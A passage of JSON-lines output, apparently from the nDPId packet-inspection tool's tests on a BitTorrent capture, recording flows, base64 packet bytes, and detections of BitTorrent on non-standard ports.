AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGU="}
01314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1455469975379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":600,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":600,"pkt_l4_len":566,"thread_ts_msec":1455469975379,"pkt":"xCwDBkn+LFbcjDU0CABFAAJKCedAAHIGROOXGl8ewKgBA1iRzq\/yoqkFBEW1zYAYHVwJbQAAAQEIChEqC1QZ3A9hYWdvaTJlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkyMjY3M2U0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MTFlNjp5b3VyaXA0OlI3zQFlAAAAdAV\/v+\/\/f\/\/+\/\/\/\/\/\/\/\/\/\/fv\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/f\/\/\/\/\/9\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/7\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/f\/\/\/\/7\/7\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/9\/9\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/ff+AAAAABQQAAAC+AAAABQQAAAB0AAAABQQAAAJcAAAABQQAAAOGAAAABQQAAAEaAAAABQQAAAA3AAAABQQAAAL2AAAABQQAAAOAAAAABQQAAAGXAAAABQQAAALiAAAABQQAAAIeAAAABQQAAAFXAAAABQQAAAJLAAAABQQAAAB7AAAABQQAAAI\/AAAABQQAAADyAAAABQQAAAAAAAAABQQAAAAgAAAABQQAAAH+AAAABQQAAANsAAAABQQAAAATAAAABQQAAALWAAAABQQAAAAJAAAABQQAAAGq"}
00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1455469975393,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1455469975393,"pkt":"LFbcjDU0xCwDBkn+CABFAADeIplAAEAGAADAqAEDl0j\/o86w6hjbuZVQ\/XvsloAYKDdZaAAAAQEIChncD64AaNAEMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEyOnV0X3JlY29tbWVuZGk1ZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNDA5NTllNDpyZXFxaTI1NWUxOnYxOTrCtVRvcnJlbnQgTWFjIDEuOC42Njp5b3VyaXA0OpdI\/6NlAAAAAQ8="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975407,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1455469975407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975407,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4fvZAAEAGAADAqAEDeD4h8c6umaQbpzY0C9TW44AYjjZcRQAAAQEIChncD7sAQ+m5E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjhq4aGFIV+2F24M="}
00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975407,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975622,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1455469975622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975622,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4JlBAAEAGAADAqAEDTzeBFs6sL0FM+lulp3q\/xoAYVhCSYwAAAQEIChncEJACXeJGE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjsY\/A3YcaePRRY8="}
00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975622,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976336,"flow_last_seen":1455469976336,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976336,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1455469976336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469976336,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4SfNAAEAGAADAqAEDxmSSCc6z6wOon+tuBozVl4AYZVEahAAAAQEIChncE1MB8nMrE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjlkC3tYvcSfI56Y="}
00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976336,"flow_last_seen":1455469976336,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976336,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1455469976513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1455469976513,"pkt":"xCwDBkn+LFbcjDU0CABFEACEZqRAAHYGg6bGZJIJwKgBA+sDzrMGjNWXqJ\/rsoAYAQLT1gAAAQEICgHycz0Z3BNTE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wokMyLr47j7jk1aEAAADnFABkMTplaTA="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976582,"flow_last_seen":1455469976582,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976582,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1455469976582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469976582,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4BctAAEAGAADAqAEDvmfDOM6ytinSUvXkM6bvoIAY+3dDtgAAAQEIChncFEcAv3iAE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkKv+eYrLs2+ChY="}
00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469976582,"flow_last_seen":1455469976582,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469976582,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
01351{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1455469976697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":625,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":625,"pkt_l4_len":591,"thread_ts_msec":1455469976697,"pkt":"xCwDBkn+LFbcjDU0CABFEAJjaOxAAHYGf3\/GZJIJwKgBA+sDzrMGjNXnqJ\/rsoAYAQJs0QAAAQEICgHyc00Z3BQDZTQ6aXB2NDQ6xmSSCTEyOmNvbXBsZXRlX2Fnb2kxZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNjAxNjNlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTE1ZTY6eW91cmlwNDpSN80BZQAAAHQFv\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/f\/\/\/\/\/3\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/f\/\/\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/\/9\/\/\/\/\/\/7\/\/\/7\/+7\/\/f\/3\/f\/\/\/\/v\/\/\/\/\/\/\/9\/9\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/3\/\/\/\/gAAAAAUEAAAClgAAAAUEAAAA6gAAAAUEAAAAugAAAAUEAAAA4AAAAAUEAAABqgAAAAUEAAACZwAAAAUEAAACTwAAAAUEAAAC8gAAAAUEAAABiQAAAAUEAAAB3QAAAAUEAAADdAAAAAUEAAAC\/gAAAAUEAAACJgAAAAUEAAACiAAAAAUEAAACvwAAAAUEAAACeQAAAAUEAAABRQAAAAUEAAACCwAAAAUEAAAAkgAAAAUEAAACdQAAAAUEAAACoAAAAAUEAAAAAQAAAAUEAAAAFAAAAAUEAAADTw=="}
00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1455469977023,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1455469977023,"pkt":"xCwDBkn+LFbcjDU0CABFAACFWMJAAHMGa2W+Z8M4wKgBA7YpzrIzpu+g0lL2KIAYAQKm2wAAAQEICgC\/ehQZ3BRHE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLUJUNzk1MC3xovjV8bH+iIGCHSYAAAEBFABkMTplaTBl"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469977229,"flow_last_seen":1455469977229,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469977229,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1455469977229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469977229,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4L\/xAAEAGAADAqAEDlw8wvc61t5l0EJCE2E\/BJoAYIPWJ4gAAAQEIChncFslLXJigE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjv4JZL7rS4V2Vgo="}
00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469977229,"flow_last_seen":1455469977229,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469977229,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1455469977285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":153,"pkt_l4_len":119,"thread_ts_msec":1455469977285,"pkt":"xCwDBkn+LFbcjDU0CABFAACLG6xAAHIGY0mXDzC9wKgBA7eZzrXYT8EmdBCQyIAYAQLHiQAAAQEICktcmNgZ3BbJE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wogWCKk\/sCNEtOuUAAADnFABkMTplaTBlNDppcHY0"}
01336{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1455469977324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":1455469977324,"pkt":"xCwDBkn+LFbcjDU0CABFAAJcG65AAHIGYXaXDzC9wKgBA7eZzrXYT8F9dBCQyIAZAQKR1gAAAQEICktcmOYZ3BbJNDqXDzC9MTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk0NzAwMWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MTdlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/\/\/\/\/7\/\/\/\/\/\/\/f\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/v7\/\/v\/\/\/\/\/u\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/37\/\/\/\/\/\/\/\/\/\/f\/\/3\/\/3\/\/\/7\/\/\/\/v\/\/f\/\/\/f\/\/\/3\/\/\/\/\/\/v\/\/f\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/3\/\/\/+AAAAABQQAAAMOAAAABQQAAAApAAAABQQAAAJ1AAAABQQAAAKiAAAABQQAAADVAAAABQQAAAH3AAAABQQAAANZAAAABQQAAADFAAAABQQAAAN2AAAABQQAAAD5AAAABQQAAAD9AAAABQQAAAL9AAAABQQAAAKRAAAABQQAAAK6AAAABQQAAAC9AAAABQQAAAFxAAAABQQAAAHwAAAABQQAAAJKAAAABQQAAAFDAAAABQQAAAJcAAAABQQAAABWAAAABQQAAALUAAAABQQAAAI2AAAABQQAAAB7"}
01382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1455469977685,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":650,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":650,"pkt_l4_len":616,"thread_ts_msec":1455469977685,"pkt":"xCwDBkn+LFbcjDU0CABFAAJ8WMNAAHMGaW2+Z8M4wKgBA7YpzrIzpu\/x0lL2fIAYAQLBOgAAAQEICgC\/e9sZ3BX+NDppcHY0NDq+Z8M4NDppcHY2MTY6IAEAAF71efs4aCApQZg8xzEyOmNvbXBsZXRlX2Fnb2kyZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNDY2MzNlNDpyZXFxaTI1NWUxOnYxNjpCaXRUb3JyZW50IDcuOS41Mjp5cGk1MjkxNGU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/X\/\/\/v\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f+\/\/\/7\/\/\/\/v\/\/\/\/\/99\/\/+\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/+7\/\/3\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/77\/\/\/f\/\/\/3\/3f\/3\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAApsAAAAFBAAAAk8AAAAFBAAAAtoAAAAFBAAAAWUAAAAFBAAAAxcAAAAFBAAAAVIAAAAFBAAAAsoAAAAFBAAAASUAAAAFBAAAADsAAAAFBAAAAOgAAAAFBAAAAg0AAAAFBAAAArAAAAAFBAAAApUAAAAFBAAAAtYAAAAFBAAAAIEAAAAFBAAAAQkAAAAFBAAAAugAAAAFBAAAAhEAAAAFBAAAAUwAAAAFBAAAAiIAAAAFBAAAAPMAAAAFBAAAAbAAAAAFBAAAACQAAAAFBAAAACI="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978413,"flow_last_seen":1455469978413,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978413,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1455469978413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469978413,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4DnNAAEAGAADAqAEDX+qfEM65oPXUDpz5ZKj0loAYkUPBEAAAAQEIChncG14CELSbE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjvUWScco35PygrU="}
00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978413,"flow_last_seen":1455469978413,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978413,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978422,"flow_last_seen":1455469978422,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978422,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1455469978422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469978422,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4xBlAAEAGAADAqAEDX+3BIs66LDm\/gbIP+oH76IAYlsHjJQAAAQEIChncG2YAA5hpE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjvGP0W3l6zj59Ik="}
00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978422,"flow_last_seen":1455469978422,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978422,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1455469978654,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469978654,"pkt":"xCwDBkn+LFbcjDU0CABFAACrIv1AAHYG\/pRf7cEiwKgBAyw5zrr6gfvov4GyU4AYAQLALAAAAQEICgADmIEZ3BtmE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wog5gTbVhOs8MSY8AAADnFABkMTplaTBlNDppcHY0NDpf7cEiMTI6Y29tcGxldGVfYWdvaTJlMTptZDExOnU="}
